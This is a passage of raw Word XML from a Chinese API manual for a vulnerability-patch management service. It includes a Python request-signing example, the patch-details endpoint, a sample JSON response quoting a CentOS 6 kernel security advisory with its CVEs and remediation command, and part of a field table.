      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print to_sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def get_linux_patch():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/vul/patch/linux/list?page=0&amp;size=50" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page':0, 'size': 50}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    get_linux_patch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBB745" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="查询补丁详情"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询补丁详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E28098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C3FB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/patch/{linux|win}/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4B93B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2C201" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26699BB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86D4E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/patch/linux/5ab243407d761b1147bfb827</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA28893" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E1D09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "patchId": "QT012016000970",                      //补丁id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kbNum": null,                                    //kb号，只有windows有</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "bulletId": null,                                 //公告号，只有windows有</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "patchName": "CentOS 6 : kernel (CESA-2016:0855)",  //补丁名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "severity": 2,                                      //危险程度</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "publishTime": "2016-05-16 00:00:00",               //补丁发布时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [                                          //影响的app</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "其他"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "An update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * It was found that reporting </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">emulation failures to user space could lead to either a local (CVE-2014-7842) or a L2-&gt;L1 (CVE-2010-5313) denial of service. In the case of a local denial of service, an attacker must have access to the MMIO area or be able to access an I/O port. Please note that on certain systems, HPET is mapped to userspace as part of vdso (vvar) and thus an unprivileged user may generate MMIO transactions (and enter the emulator) this way. (CVE-2010-5313, CVE-2014-7842, Moderate) * It was found that the Linux kernel did not properly account file descriptors passed over the unix socket against the process limit. A local user could use this flaw to exhaust all available memory on the system. (CVE-2013-4312, Moderate) * A buffer overflow flaw was found in the way the Linux kernel's virtio-net subsystem handled certain fraglists when the GRO (Generic Receive Offload) functionality was enabled in a bridged network configuration. An attacker on the local network could potentially use this flaw to crash the system, or, although unlikely, elevate their privileges on the system. (CVE-2015-5156, Moderate) * It was found that the Linux kernel's IPv6 network stack did not properly validate the value of the MTU variable when it was set. A remote attacker could potentially use this flaw to disrupt a target system's networking (packet loss) by setting an invalid MTU value, for example, via a NetworkManager daemon that is processing router advertisement packets running on the target system. (CVE-2015-8215, Moderate) * A NULL pointer dereference flaw was found in the way the Linux kernel's network subsystem handled socket creation with an invalid protocol identifier. A local user could use this flaw to crash the system. (CVE-2015-8543, Moderate) * It was found that the espfix functionality does not work for 32-bit KVM paravirtualized guests. A local, unprivileged guest user could potentially use this flaw to leak kernel stack addresses. (CVE-2014-8134, Low) * A flaw was found in the way the Linux kernel's ext4 file system driver handled non-journal file systems with an orphan list. An attacker with physical access to the system could use this flaw to crash the system or, although unlikely, escalate their privileges on the system. (CVE-2015-7509, Low) * A NULL pointer dereference flaw was found in the way the Linux kernel's ext4 file system driver handled certain </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>corrupted file system images. An attacker with physical access to the system could use this flaw to crash the system. (CVE-2015-8324, Low) Red Hat would like to thank Nadav Amit for reporting CVE-2010-5313 and CVE-2014-7842, Andy Lutomirski for reporting CVE-2014-8134, and Dmitriy Monakhov (OpenVZ) for reporting CVE-2015-8324. The CVE-2015-5156 issue was discovered by Jason Wang (Red Hat). Additional Changes : * Refer to Red Hat Enterprise Linux 6.8 Release Notes for information on new kernel features and known issues, and Red Hat Enterprise Linux Technical Notes for information on device driver updates, important changes to external kernel parameters, notable bug fixes, and technology previews. Both of these documents are linked to in the References section.",                              //补丁描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     "check": {                              //校验信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "details": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">             {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "os": "centos-6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "name": "kernel",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "fixVersion": "2.6.32-642.el6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "version": "2.6.32-431.el6"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">             }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     "remedCmd": "sudo yum update -y kernel"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remedDesc": "这个补丁修复了Red Hat Enterprise Linux 6 kernel的多个漏洞，本地攻击者可利用该漏洞耗尽系统所有可用内存、使系统崩溃甚至提升权限。漏洞修复后需要系统重启。建议业务不繁忙时修复。",         //修复建议</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remedCmd": "sudo yum update -y kernel",                               //修复命令  linux独有</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "installPackage": null,                                            //安装包地址, windows有</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cvssScore": "7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cvssDetail": "AV:L/AC:M/Au:N/C:C/I:C/A:C",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ref": "CVE-2010-5313,CVE-2013-4312,CVE-2014-7842,CVE-2014-8134,CVE-2015-5156,CVE-2015-7509,CVE-2015-8215,CVE-2015-8324,CVE-2015-8543",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "restartOpts": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hasExp": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "isKernel": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "isLocalEscalation": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "isRemote": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hasPoc": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pocRefs": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "impacts": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime":"2016-05-16 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "businessImpact":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CAD7F"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846"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5685"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="58EDB42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DE8C911" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0676422F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D5B09D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE51899" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E536047" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3225DFDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>patchId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7209FFFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04AEA3E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD23BF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B02AC6E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FA14CB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kbNum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A083EBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295C2FC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A1D203" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kb号 （仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="074DC9B2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="609DF504" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bulletId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26CD7A70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33DEE850" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>char(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098325CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公告号（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0037AAF7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3F692F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>patchName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71B320C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFCE03B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23334054" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="359CF0C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A66E0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D86B32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A95453E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B8E1A8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>危险程度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E5E1709" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60CD0709" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>publishTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3493C5D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24191C86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72681798" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁发布时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="771D2072" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA66EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DEF5028" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E312C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02544D10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>影响的app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D03CF15" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3372BA1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535ACF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD015AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12DC004A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A2C5348" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="362C14F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542C6A38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F3CC2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
